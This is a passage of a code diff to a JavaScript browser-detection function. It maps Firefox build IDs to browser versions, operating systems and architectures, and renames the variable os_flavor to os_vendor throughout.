case "20091221151141": ua_version = "3.5.7"; os_name = oses_mac_osx; break;
|
||||
case "20091221152502": ua_version = "3.5.7"; os_name = oses_linux; break;
|
||||
case "2009122115": ua_version = "3.0.17"; break; // Can be either Mac or Linux
|
||||
case "20091221164558": ua_version = "3.5.7"; os_name = oses_windows; break;
|
||||
case "2009122116": ua_version = "3.0.17"; os_name = oses_windows; break;
|
||||
case "2009122200": ua_version = "3.5.7"; os_name = oses_linux; os_flavor = "SUSE"; break;
|
||||
case "20091223231431": ua_version = "3.5.6"; os_name = oses_linux; os_flavor = "PCLunixOS"; arch = arch_x86; break;
|
||||
case "2009122200": ua_version = "3.5.7"; os_name = oses_linux; os_vendor = "SUSE"; break;
|
||||
case "20091223231431": ua_version = "3.5.6"; os_name = oses_linux; os_vendor = "PCLunixOS"; arch = arch_x86; break;
|
||||
case "20100105194006": ua_version = "3.6.0.rc1"; os_name = oses_mac_osx; break;
|
||||
case "20100105194116": ua_version = "3.6.0.rc1"; os_name = oses_linux; break;
|
||||
case "20100105212446": ua_version = "3.6.0.rc1"; os_name = oses_windows; break;
|
||||
case "2010010604": ua_version = "3.0.18"; os_name = oses_linux; os_flavor = "Ubuntu"; break;
|
||||
case "20100106054534": ua_version = "3.5.8"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break; // Could also be Mint x86
|
||||
case "20100106054634": ua_version = "3.5.8"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break; // Could also be Mint x86-64
|
||||
case "2010010605": ua_version = "3.0.18"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break;
|
||||
case "20100106211825": ua_version = "3.5.7"; os_name = oses_freebsd; os_flavor = "PC-BSD"; arch = arch_x86; break;
|
||||
case "20100106212742": ua_version = "3.5.7"; os_name = oses_freebsd; os_flavor = "PC-BSD"; arch = arch_x86_64; break;
|
||||
case "20100106215614": ua_version = "3.5.7"; os_name = oses_freebsd; os_flavor = "PC-BSD"; arch = arch_x86; break;
|
||||
case "20100110112429": ua_version = "3.5.7"; os_name = oses_linux; os_flavor = "Mandriva"; break;
|
||||
case "2010010604": ua_version = "3.0.18"; os_name = oses_linux; os_vendor = "Ubuntu"; break;
|
||||
case "20100106054534": ua_version = "3.5.8"; os_name = oses_linux; os_vendor = "Ubuntu"; arch = arch_x86; break; // Could also be Mint x86
|
||||
case "20100106054634": ua_version = "3.5.8"; os_name = oses_linux; os_vendor = "Ubuntu"; arch = arch_x86_64; break; // Could also be Mint x86-64
|
||||
case "2010010605": ua_version = "3.0.18"; os_name = oses_linux; os_vendor = "Ubuntu"; arch = arch_x86_64; break;
|
||||
case "20100106211825": ua_version = "3.5.7"; os_name = oses_freebsd; os_vendor = "PC-BSD"; arch = arch_x86; break;
|
||||
case "20100106212742": ua_version = "3.5.7"; os_name = oses_freebsd; os_vendor = "PC-BSD"; arch = arch_x86_64; break;
|
||||
case "20100106215614": ua_version = "3.5.7"; os_name = oses_freebsd; os_vendor = "PC-BSD"; arch = arch_x86; break;
|
||||
case "20100110112429": ua_version = "3.5.7"; os_name = oses_linux; os_vendor = "Mandriva"; break;
|
||||
case "20100115132715": ua_version = "3.6.0"; os_name = oses_mac_osx; break;
|
||||
case "20100115133306": ua_version = "3.6.0"; os_name = oses_linux; break;
|
||||
case "20100115144158": ua_version = "3.6.0"; os_name = oses_windows; break;
|
||||
case "20100125074043": ua_version = "3.6.0"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break; // Could also be Mint x86
|
||||
case "20100125074127": ua_version = "3.6.0"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break; // Could also be Mint x86-64
|
||||
case "20100125204847": ua_version = "3.6.0"; os_name = oses_linux; os_flavor = "Sabayon"; arch = arch_x86; break; // Could also be Mint x86
|
||||
case "20100125204903": ua_version = "3.6.0"; os_name = oses_linux; os_flavor = "Sabayon"; arch = arch_x86_64; break; // Could also be Mint x86-64
|
||||
case "20100125074043": ua_version = "3.6.0"; os_name = oses_linux; os_vendor = "Ubuntu"; arch = arch_x86; break; // Could also be Mint x86
|
||||
case "20100125074127": ua_version = "3.6.0"; os_name = oses_linux; os_vendor = "Ubuntu"; arch = arch_x86_64; break; // Could also be Mint x86-64
|
||||
case "20100125204847": ua_version = "3.6.0"; os_name = oses_linux; os_vendor = "Sabayon"; arch = arch_x86; break; // Could also be Mint x86
|
||||
case "20100125204903": ua_version = "3.6.0"; os_name = oses_linux; os_vendor = "Sabayon"; arch = arch_x86_64; break; // Could also be Mint x86-64
|
||||
case "20100202152834": ua_version = "3.5.8"; os_name = oses_mac_osx; break;
|
||||
case "20100202153512": ua_version = "3.5.8"; os_name = oses_linux; break;
|
||||
case "20100202165920": ua_version = "3.5.8"; os_name = oses_windows; break;
|
||||
case "2010020219": ua_version = "3.0.18"; os_name = oses_mac_osx; break;
|
||||
case "2010020220": ua_version = "3.0.18"; os_name = oses_windows; break;
|
||||
case "2010020400": ua_version = "3.5.8"; os_name = oses_linux; os_flavor = "SUSE"; break;
|
||||
case "20100212131909": ua_version = "3.6.0.2"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break;
|
||||
case "20100212132013": ua_version = "3.6.0.2"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break;
|
||||
case "20100216105329": ua_version = "3.5.8"; os_name = oses_linux; os_flavor = "Fedora"; arch = arch_x86_64; break;
|
||||
case "20100216105348": ua_version = "3.5.8"; os_name = oses_linux; os_flavor = "Fedora"; arch = arch_x86; break;
|
||||
case "20100216105410": ua_version = "3.5.8"; os_name = oses_linux; os_flavor = "Fedora"; arch = arch_x86; break;
|
||||
case "20100216110009": ua_version = "3.5.8"; os_name = oses_linux; os_flavor = "Fedora"; arch = arch_x86_64; break;
|
||||
case "2010021718": ua_version = "3.0.18"; os_name = oses_linux; os_flavor = "CentOS"; arch = arch_x86; break;
|
||||
case "20100218022359": ua_version = "3.6.0.4"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break;
|
||||
case "20100218022705": ua_version = "3.6.0.4"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break;
|
||||
case "20100218112915": ua_version = "3.5.8"; os_name = oses_linux; os_flavor = "Mandriva"; arch = arch_x86; break;
|
||||
case "20100222120605": ua_version = "3.6.0.5"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break;
|
||||
case "20100222120717": ua_version = "3.6.0.5"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break;
|
||||
case "20100301015346": ua_version = "3.6.0"; os_name = oses_freebsd; os_flavor = "PC-BSD"; arch = arch_x86; break;
|
||||
case "20100305054927": ua_version = "3.6.0"; os_name = oses_freebsd; os_flavor = "PC-BSD"; arch = arch_x86_64; break;
|
||||
case "20100307204001": ua_version = "3.6.0"; os_name = oses_freebsd; os_flavor = "PC-BSD"; arch = arch_x86; break;
|
||||
case "20100308142847": ua_version = "3.6.0.6"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break;
|
||||
case "20100308151019": ua_version = "3.6.0.6"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break;
|
||||
case "2010020400": ua_version = "3.5.8"; os_name = oses_linux; os_vendor = "SUSE"; break;
|
||||
case "20100212131909": ua_version = "3.6.0.2"; os_name = oses_linux; os_vendor = "Ubuntu"; arch = arch_x86; break;
|
||||
case "20100212132013": ua_version = "3.6.0.2"; os_name = oses_linux; os_vendor = "Ubuntu"; arch = arch_x86_64; break;
|
||||
case "20100216105329": ua_version = "3.5.8"; os_name = oses_linux; os_vendor = "Fedora"; arch = arch_x86_64; break;
|
||||
case "20100216105348": ua_version = "3.5.8"; os_name = oses_linux; os_vendor = "Fedora"; arch = arch_x86; break;
|
||||
case "20100216105410": ua_version = "3.5.8"; os_name = oses_linux; os_vendor = "Fedora"; arch = arch_x86; break;
|
||||
case "20100216110009": ua_version = "3.5.8"; os_name = oses_linux; os_vendor = "Fedora"; arch = arch_x86_64; break;
|
||||
case "2010021718": ua_version = "3.0.18"; os_name = oses_linux; os_vendor = "CentOS"; arch = arch_x86; break;
|
||||
case "20100218022359": ua_version = "3.6.0.4"; os_name = oses_linux; os_vendor = "Ubuntu"; arch = arch_x86; break;
|
||||
case "20100218022705": ua_version = "3.6.0.4"; os_name = oses_linux; os_vendor = "Ubuntu"; arch = arch_x86_64; break;
|
||||
case "20100218112915": ua_version = "3.5.8"; os_name = oses_linux; os_vendor = "Mandriva"; arch = arch_x86; break;
|
||||
case "20100222120605": ua_version = "3.6.0.5"; os_name = oses_linux; os_vendor = "Ubuntu"; arch = arch_x86; break;
|
||||
case "20100222120717": ua_version = "3.6.0.5"; os_name = oses_linux; os_vendor = "Ubuntu"; arch = arch_x86_64; break;
|
||||
case "20100301015346": ua_version = "3.6.0"; os_name = oses_freebsd; os_vendor = "PC-BSD"; arch = arch_x86; break;
|
||||
case "20100305054927": ua_version = "3.6.0"; os_name = oses_freebsd; os_vendor = "PC-BSD"; arch = arch_x86_64; break;
|
||||
case "20100307204001": ua_version = "3.6.0"; os_name = oses_freebsd; os_vendor = "PC-BSD"; arch = arch_x86; break;
|
||||
case "20100308142847": ua_version = "3.6.0.6"; os_name = oses_linux; os_vendor = "Ubuntu"; arch = arch_x86; break;
|
||||
case "20100308151019": ua_version = "3.6.0.6"; os_name = oses_linux; os_vendor = "Ubuntu"; arch = arch_x86_64; break;
|
||||
case "2010031218": ua_version = "3.0.19"; break; // Mac OS X or Linux
|
||||
case "2010031422": ua_version = "3.0.19"; os_name = oses_windows; break;
|
||||
case "20100315075757": ua_version = "3.5.9"; os_name = oses_linux; break;
|
||||
|
@ -575,48 +582,48 @@ os_detect.getVersion = function(){
|
|||
case "20100316055951": ua_version = "3.6.2"; os_name = oses_mac_osx; break;
|
||||
case "20100316060223": ua_version = "3.6.2"; os_name = oses_linux; break;
|
||||
case "20100316074819": ua_version = "3.6.2"; os_name = oses_windows; break;
|
||||
case "2010031700": ua_version = "3.5.9"; os_name = oses_linux; os_flavor = "SUSE"; break;
|
||||
case "20100323102218": ua_version = "3.6.2"; os_name = oses_linux; os_flavor = "Fedora"; arch = arch_x86_64; break;
|
||||
case "20100323102339": ua_version = "3.6.2"; os_name = oses_linux; os_flavor = "Fedora"; arch = arch_x86; break;
|
||||
case "20100323194640": ua_version = "3.6.2"; os_name = oses_freebsd; os_flavor = "PC-BSD"; arch = arch_x86_64; break;
|
||||
case "20100324182054": ua_version = "3.6.2"; os_name = oses_freebsd; os_flavor = "PC-BSD"; arch = arch_x86; break;
|
||||
case "20100330071911": ua_version = "3.5.9"; os_name = oses_linux; os_flavor = "Fedora"; arch = arch_x86_64; break;
|
||||
case "20100330072017": ua_version = "3.5.9"; os_name = oses_linux; os_flavor = "Fedora"; arch = arch_x86_64; break;
|
||||
case "20100330072020": ua_version = "3.5.9"; os_name = oses_linux; os_flavor = "Fedora"; arch = arch_x86; break;
|
||||
case "20100330072034": ua_version = "3.5.9"; os_name = oses_linux; os_flavor = "Fedora"; arch = arch_x86; break;
|
||||
case "2010031700": ua_version = "3.5.9"; os_name = oses_linux; os_vendor = "SUSE"; break;
|
||||
case "20100323102218": ua_version = "3.6.2"; os_name = oses_linux; os_vendor = "Fedora"; arch = arch_x86_64; break;
|
||||
case "20100323102339": ua_version = "3.6.2"; os_name = oses_linux; os_vendor = "Fedora"; arch = arch_x86; break;
|
||||
case "20100323194640": ua_version = "3.6.2"; os_name = oses_freebsd; os_vendor = "PC-BSD"; arch = arch_x86_64; break;
|
||||
case "20100324182054": ua_version = "3.6.2"; os_name = oses_freebsd; os_vendor = "PC-BSD"; arch = arch_x86; break;
|
||||
case "20100330071911": ua_version = "3.5.9"; os_name = oses_linux; os_vendor = "Fedora"; arch = arch_x86_64; break;
|
||||
case "20100330072017": ua_version = "3.5.9"; os_name = oses_linux; os_vendor = "Fedora"; arch = arch_x86_64; break;
|
||||
case "20100330072020": ua_version = "3.5.9"; os_name = oses_linux; os_vendor = "Fedora"; arch = arch_x86; break;
|
||||
case "20100330072034": ua_version = "3.5.9"; os_name = oses_linux; os_vendor = "Fedora"; arch = arch_x86; break;
|
||||
case "20100401064631": ua_version = "3.6.3"; os_name = oses_mac_osx; break;
|
||||
case "20100401074458": ua_version = "3.6.3"; os_name = oses_linux; break;
|
||||
case "20100401080539": ua_version = "3.6.3"; os_name = oses_windows; break;
|
||||
case "20100401144201": ua_version = "3.6.2"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break;
|
||||
case "2010040116": ua_version = "3.0.19"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break;
|
||||
case "2010040118": ua_version = "3.0.19"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break;
|
||||
case "2010040119": ua_version = "3.0.19"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break;
|
||||
case "20100401213457": ua_version = "3.5.9"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break;
|
||||
case "2010040121": ua_version = "3.0.19"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break;
|
||||
case "2010040123": ua_version = "3.0.19"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break;
|
||||
case "2010040200": ua_version = "3.0.19"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break;
|
||||
case "20100402010516": ua_version = "3.5.9"; os_name = oses_linux; os_flavor = "Mint"; arch = arch_x86_64; break;
|
||||
case "20100402041908": ua_version = "3.6.2"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break;
|
||||
case "20100403042003": ua_version = "3.6.3"; os_name = oses_linux; os_flavor = "Fedora"; arch = arch_x86_64; break;
|
||||
case "20100403082016": ua_version = "3.6.3"; os_name = oses_linux; os_flavor = "Fedora"; arch = arch_x86; break;
|
||||
case "20100404024515": ua_version = "3.6.3"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break;
|
||||
case "20100404024646": ua_version = "3.6.3"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break;
|
||||
case "20100404104043": ua_version = "3.6.3"; os_name = oses_linux; os_flavor = "PClinuxOS"; arch = arch_x86_64; break;
|
||||
case "20100409151117": ua_version = "3.6.3.2"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break;
|
||||
case "20100409170726": ua_version = "3.6.3.2"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break;
|
||||
case "20100412125148": ua_version = "3.6.3"; os_name = oses_linux; os_flavor = "Mandriva"; arch = arch_x86; break;
|
||||
case "20100401144201": ua_version = "3.6.2"; os_name = oses_linux; os_vendor = "Ubuntu"; arch = arch_x86; break;
|
||||
case "2010040116": ua_version = "3.0.19"; os_name = oses_linux; os_vendor = "Ubuntu"; arch = arch_x86; break;
|
||||
case "2010040118": ua_version = "3.0.19"; os_name = oses_linux; os_vendor = "Ubuntu"; arch = arch_x86; break;
|
||||
case "2010040119": ua_version = "3.0.19"; os_name = oses_linux; os_vendor = "Ubuntu"; arch = arch_x86; break;
|
||||
case "20100401213457": ua_version = "3.5.9"; os_name = oses_linux; os_vendor = "Ubuntu"; arch = arch_x86; break;
|
||||
case "2010040121": ua_version = "3.0.19"; os_name = oses_linux; os_vendor = "Ubuntu"; arch = arch_x86_64; break;
|
||||
case "2010040123": ua_version = "3.0.19"; os_name = oses_linux; os_vendor = "Ubuntu"; arch = arch_x86_64; break;
|
||||
case "2010040200": ua_version = "3.0.19"; os_name = oses_linux; os_vendor = "Ubuntu"; arch = arch_x86_64; break;
|
||||
case "20100402010516": ua_version = "3.5.9"; os_name = oses_linux; os_vendor = "Mint"; arch = arch_x86_64; break;
|
||||
case "20100402041908": ua_version = "3.6.2"; os_name = oses_linux; os_vendor = "Ubuntu"; arch = arch_x86_64; break;
|
||||
case "20100403042003": ua_version = "3.6.3"; os_name = oses_linux; os_vendor = "Fedora"; arch = arch_x86_64; break;
|
||||
case "20100403082016": ua_version = "3.6.3"; os_name = oses_linux; os_vendor = "Fedora"; arch = arch_x86; break;
|
||||
case "20100404024515": ua_version = "3.6.3"; os_name = oses_linux; os_vendor = "Ubuntu"; arch = arch_x86; break;
|
||||
case "20100404024646": ua_version = "3.6.3"; os_name = oses_linux; os_vendor = "Ubuntu"; arch = arch_x86_64; break;
|
||||
case "20100404104043": ua_version = "3.6.3"; os_name = oses_linux; os_vendor = "PClinuxOS"; arch = arch_x86_64; break;
|
||||
case "20100409151117": ua_version = "3.6.3.2"; os_name = oses_linux; os_vendor = "Ubuntu"; arch = arch_x86; break;
|
||||
case "20100409170726": ua_version = "3.6.3.2"; os_name = oses_linux; os_vendor = "Ubuntu"; arch = arch_x86_64; break;
|
||||
case "20100412125148": ua_version = "3.6.3"; os_name = oses_linux; os_vendor = "Mandriva"; arch = arch_x86; break;
|
||||
case "20100413152922": ua_version = "3.6.4.b1"; os_name = oses_mac_osx; break;
|
||||
case "20100413154310": ua_version = "3.6.4.b1"; os_name = oses_linux; break;
|
||||
case "20100413172113": ua_version = "3.6.4.b1"; os_name = oses_windows; break;
|
||||
case "20100415062243": ua_version = "3.6.3.3"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break;
|
||||
case "20100415103754": ua_version = "3.6.3.3"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break;
|
||||
case "20100416101101": ua_version = "3.6.3.2"; os_name = oses_linux; os_flavor = "Mandriva"; arch = arch_x86; break;
|
||||
case "2010041700": ua_version = "3.6.4.1"; os_name = oses_linux; os_flavor = "SUSE"; break;
|
||||
case "20100419015333": ua_version = "3.6.3"; os_name = oses_freebsd; os_flavor = "PC-BSD"; arch = arch_x86_64; break;
|
||||
case "20100423043606": ua_version = "3.6.3"; os_name = oses_linux; os_flavor = "Sabayon"; arch = arch_x86_64; break;
|
||||
case "20100423140709": ua_version = "3.6.3"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break;
|
||||
case "20100423141150": ua_version = "3.6.3"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break;
|
||||
case "20100423142835": ua_version = "3.6.3"; os_name = oses_freebsd; os_flavor = "PC-BSD"; arch = arch_x86; break;
|
||||
case "20100415062243": ua_version = "3.6.3.3"; os_name = oses_linux; os_vendor = "Ubuntu"; arch = arch_x86; break;
|
||||
case "20100415103754": ua_version = "3.6.3.3"; os_name = oses_linux; os_vendor = "Ubuntu"; arch = arch_x86_64; break;
|
||||
case "20100416101101": ua_version = "3.6.3.2"; os_name = oses_linux; os_vendor = "Mandriva"; arch = arch_x86; break;
|
||||
case "2010041700": ua_version = "3.6.4.1"; os_name = oses_linux; os_vendor = "SUSE"; break;
|
||||
case "20100419015333": ua_version = "3.6.3"; os_name = oses_freebsd; os_vendor = "PC-BSD"; arch = arch_x86_64; break;
|
||||
case "20100423043606": ua_version = "3.6.3"; os_name = oses_linux; os_vendor = "Sabayon"; arch = arch_x86_64; break;
|
||||
case "20100423140709": ua_version = "3.6.3"; os_name = oses_linux; os_vendor = "Ubuntu"; arch = arch_x86; break;
|
||||
case "20100423141150": ua_version = "3.6.3"; os_name = oses_linux; os_vendor = "Ubuntu"; arch = arch_x86_64; break;
|
||||
case "20100423142835": ua_version = "3.6.3"; os_name = oses_freebsd; os_vendor = "PC-BSD"; arch = arch_x86; break;
|
||||
case "20100502202326": ua_version = "3.6.4.b2"; os_name = oses_linux; break;
|
||||
case "20100502202401": ua_version = "3.6.4.b2"; os_name = oses_mac_osx; break;
|
||||
case "20100502221517": ua_version = "3.6.4.b2"; os_name = oses_windows; break;
|
||||
|
@ -626,69 +633,69 @@ os_detect.getVersion = function(){
|
|||
case "20100504085637": ua_version = "3.5.10"; os_name = oses_linux; break;
|
||||
case "20100504085753": ua_version = "3.5.10"; os_name = oses_mac_osx; break;
|
||||
case "20100504093643": ua_version = "3.5.10"; os_name = oses_windows; break;
|
||||
case "2010050600": ua_version = "3.5.10"; os_name = oses_linux; os_flavor = "SUSE"; break;
|
||||
case "2010051300": ua_version = "3.6.4.1"; os_name = oses_linux; os_flavor = "SUSE"; break;
|
||||
case "2010050600": ua_version = "3.5.10"; os_name = oses_linux; os_vendor = "SUSE"; break;
|
||||
case "2010051300": ua_version = "3.6.4.1"; os_name = oses_linux; os_vendor = "SUSE"; break;
|
||||
case "20100513134853": ua_version = "3.6.4.b4"; os_name = oses_mac_osx; break;
|
||||
case "20100513140540": ua_version = "3.6.4.b4"; os_name = oses_linux; break;
|
||||
case "20100513144105": ua_version = "3.6.4.b4"; os_name = oses_windows; break;
|
||||
case "20100513190740": ua_version = "3.6.3"; os_name = oses_freebsd; os_flavor = "PC-BSD"; arch = arch_x86_64; break;
|
||||
case "20100513190740": ua_version = "3.6.3"; os_name = oses_freebsd; os_vendor = "PC-BSD"; arch = arch_x86_64; break;
|
||||
case "20100523180910": ua_version = "3.6.4.b5"; os_name = oses_mac_osx; break;
|
||||
case "20100523181754": ua_version = "3.6.4.b5"; os_name = oses_linux; break;
|
||||
case "20100523185824": ua_version = "3.6.4.b5"; os_name = oses_windows; break;
|
||||
case "20100527084110": ua_version = "3.6.4.b6"; os_name = oses_mac_osx; break;
|
||||
case "20100527085242": ua_version = "3.6.4.b6"; os_name = oses_linux; break;
|
||||
case "20100527093236": ua_version = "3.6.4.b6"; os_name = oses_windows; break;
|
||||
case "2010061100": ua_version = "3.6.4"; os_name = oses_linux; os_flavor = "SUSE"; break;
|
||||
case "2010061100": ua_version = "3.6.4"; os_name = oses_linux; os_vendor = "SUSE"; break;
|
||||
case "20100611134546": ua_version = "3.6.4.b7"; os_name = oses_mac_osx; break;
|
||||
case "20100611135942": ua_version = "3.6.4.b7"; os_name = oses_linux; break;
|
||||
case "20100611143157": ua_version = "3.6.4.b7"; os_name = oses_windows; break;
|
||||
case "20100622203044": ua_version = "3.6.4"; os_name = oses_linux; os_flavor = "Fedora"; arch = arch_x86_64; break;
|
||||
case "20100622203045": ua_version = "3.6.4"; os_name = oses_linux; os_flavor = "Fedora"; arch = arch_x86; break;
|
||||
case "20100622204750": ua_version = "3.5.10"; os_name = oses_linux; os_flavor = "Fedora"; arch = arch_x86_64; break;
|
||||
case "20100622204830": ua_version = "3.5.10"; os_name = oses_linux; os_flavor = "Fedora"; arch = arch_x86; break;
|
||||
case "20100622205038": ua_version = "3.6.4"; os_name = oses_linux; os_flavor = "PClinuxOS"; arch = arch_x86_64; break;
|
||||
case "20100623081410": ua_version = "3.6.4"; os_name = oses_linux; os_flavor = "CentOS"; arch = arch_x86_64; break;
|
||||
case "20100623081921": ua_version = "3.6.4"; os_name = oses_linux; os_flavor = "CentOS"; arch = arch_x86; break;
|
||||
case "20100623155731": ua_version = "3.6.4.b7"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break;
|
||||
case "20100623200132": ua_version = "3.6.4.b7"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break;
|
||||
case "20100622203044": ua_version = "3.6.4"; os_name = oses_linux; os_vendor = "Fedora"; arch = arch_x86_64; break;
|
||||
case "20100622203045": ua_version = "3.6.4"; os_name = oses_linux; os_vendor = "Fedora"; arch = arch_x86; break;
|
||||
case "20100622204750": ua_version = "3.5.10"; os_name = oses_linux; os_vendor = "Fedora"; arch = arch_x86_64; break;
|
||||
case "20100622204830": ua_version = "3.5.10"; os_name = oses_linux; os_vendor = "Fedora"; arch = arch_x86; break;
|
||||
case "20100622205038": ua_version = "3.6.4"; os_name = oses_linux; os_vendor = "PClinuxOS"; arch = arch_x86_64; break;
|
||||
case "20100623081410": ua_version = "3.6.4"; os_name = oses_linux; os_vendor = "CentOS"; arch = arch_x86_64; break;
|
||||
case "20100623081921": ua_version = "3.6.4"; os_name = oses_linux; os_vendor = "CentOS"; arch = arch_x86; break;
|
||||
case "20100623155731": ua_version = "3.6.4.b7"; os_name = oses_linux; os_vendor = "Ubuntu"; arch = arch_x86; break;
|
||||
case "20100623200132": ua_version = "3.6.4.b7"; os_name = oses_linux; os_vendor = "Ubuntu"; arch = arch_x86_64; break;
|
||||
case "20100625222733": ua_version = "3.6.6"; os_name = oses_linux; break;
|
||||
case "20100625223402": ua_version = "3.6.6"; os_name = oses_mac_osx; break;
|
||||
case "20100625231939": ua_version = "3.6.6"; os_name = oses_windows; break;
|
||||
case "20100626104508": ua_version = "3.6.4"; os_name = oses_freebsd; os_flavor = "PC-BSD"; arch = arch_x86; break;
|
||||
case "20100627211341": ua_version = "3.6.4"; os_name = oses_freebsd; os_flavor = "PC-BSD"; arch = arch_x86_64; break;
|
||||
case "20100628082832": ua_version = "3.6.6"; os_name = oses_linux; os_flavor = "PClinuxOS"; arch = arch_x86_64; break;
|
||||
case "20100628124739": ua_version = "3.6.6"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break;
|
||||
case "20100628143222": ua_version = "3.6.6"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break;
|
||||
case "20100628232431": ua_version = "3.6.6"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break;
|
||||
case "20100629034705": ua_version = "3.6.6"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break;
|
||||
case "20100629105354": ua_version = "3.6.6"; os_name = oses_linux; os_flavor = "Mandriva"; arch = arch_x86; break;
|
||||
case "20100630130433": ua_version = "3.6.6"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break;
|
||||
case "20100626104508": ua_version = "3.6.4"; os_name = oses_freebsd; os_vendor = "PC-BSD"; arch = arch_x86; break;
|
||||
case "20100627211341": ua_version = "3.6.4"; os_name = oses_freebsd; os_vendor = "PC-BSD"; arch = arch_x86_64; break;
|
||||
case "20100628082832": ua_version = "3.6.6"; os_name = oses_linux; os_vendor = "PClinuxOS"; arch = arch_x86_64; break;
|
||||
case "20100628124739": ua_version = "3.6.6"; os_name = oses_linux; os_vendor = "Ubuntu"; arch = arch_x86; break;
|
||||
case "20100628143222": ua_version = "3.6.6"; os_name = oses_linux; os_vendor = "Ubuntu"; arch = arch_x86_64; break;
|
||||
case "20100628232431": ua_version = "3.6.6"; os_name = oses_linux; os_vendor = "Ubuntu"; arch = arch_x86; break;
|
||||
case "20100629034705": ua_version = "3.6.6"; os_name = oses_linux; os_vendor = "Ubuntu"; arch = arch_x86_64; break;
|
||||
case "20100629105354": ua_version = "3.6.6"; os_name = oses_linux; os_vendor = "Mandriva"; arch = arch_x86; break;
|
||||
case "20100630130433": ua_version = "3.6.6"; os_name = oses_linux; os_vendor = "Ubuntu"; arch = arch_x86_64; break;
|
||||
case "20100630131607": ua_version = "4.0.0.b1"; os_name = oses_mac_osx; break;
|
||||
case "20100630132217": ua_version = "4.0.0.b1"; os_name = oses_linux; break;
|
||||
case "20100630141702": ua_version = "4.0.0.b1"; os_name = oses_windows; break;
|
||||
case "20100630174226": ua_version = "3.6.6"; os_name = oses_linux; os_flavor = "Sabayon"; arch = arch_x86_64; break;
|
||||
case "20100630180611": ua_version = "3.6.6"; os_name = oses_linux; os_flavor = "Sabayon"; arch = arch_x86; break;
|
||||
case "20100709115208": ua_version = "3.6.7.b1"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break;
|
||||
case "20100709183408": ua_version = "3.6.7.b1"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break;
|
||||
case "20100716093011": ua_version = "3.6.7.b2"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break;
|
||||
case "20100630174226": ua_version = "3.6.6"; os_name = oses_linux; os_vendor = "Sabayon"; arch = arch_x86_64; break;
|
||||
case "20100630180611": ua_version = "3.6.6"; os_name = oses_linux; os_vendor = "Sabayon"; arch = arch_x86; break;
|
||||
case "20100709115208": ua_version = "3.6.7.b1"; os_name = oses_linux; os_vendor = "Ubuntu"; arch = arch_x86; break;
|
||||
case "20100709183408": ua_version = "3.6.7.b1"; os_name = oses_linux; os_vendor = "Ubuntu"; arch = arch_x86_64; break;
|
||||
case "20100716093011": ua_version = "3.6.7.b2"; os_name = oses_linux; os_vendor = "Ubuntu"; arch = arch_x86_64; break;
|
||||
case "20101203075014": ua_version = "3.6.13"; os_name = oses_windows; break;
|
||||
case "20101206122825": ua_version = "3.6.13"; os_name = oses_linux; os_flavor = "Ubuntu"; break;
|
||||
case "20101206122825": ua_version = "3.6.13"; os_name = oses_linux; os_vendor = "Ubuntu"; break;
|
||||
case "20110318052756": ua_version = "4.0"; os_name = oses_windows; break; // browsershots: Firefox 4.0 / Windows XP
|
||||
case "20110420144310": ua_version = "3.5.19"; os_name = oses_linux; os_flavor = "Debian"; break; // browsershots: Firefox 3.5.19 / Debian 4.0 (Etch)
|
||||
case "20110420144310": ua_version = "3.5.19"; os_name = oses_linux; os_vendor = "Debian"; break; // browsershots: Firefox 3.5.19 / Debian 4.0 (Etch)
|
||||
case "20110615151330": ua_version = "5.0"; os_name = oses_windows; break; // browsershots: Firefox 5.0 / Windows XP
|
||||
case "20110811165603": ua_version = "6.0"; os_name = oses_windows; break; // browsershots: Firefox 6.0 / Windows XP
|
||||
case "20110830092941": ua_version = "6.0.1"; os_name = oses_linux; os_flavor = "Debian"; break; // browsershots: Firefox 6.0.1 / Debian 4.0 (Etch)
|
||||
case "20110830092941": ua_version = "6.0.1"; os_name = oses_linux; os_vendor = "Debian"; break; // browsershots: Firefox 6.0.1 / Debian 4.0 (Etch)
|
||||
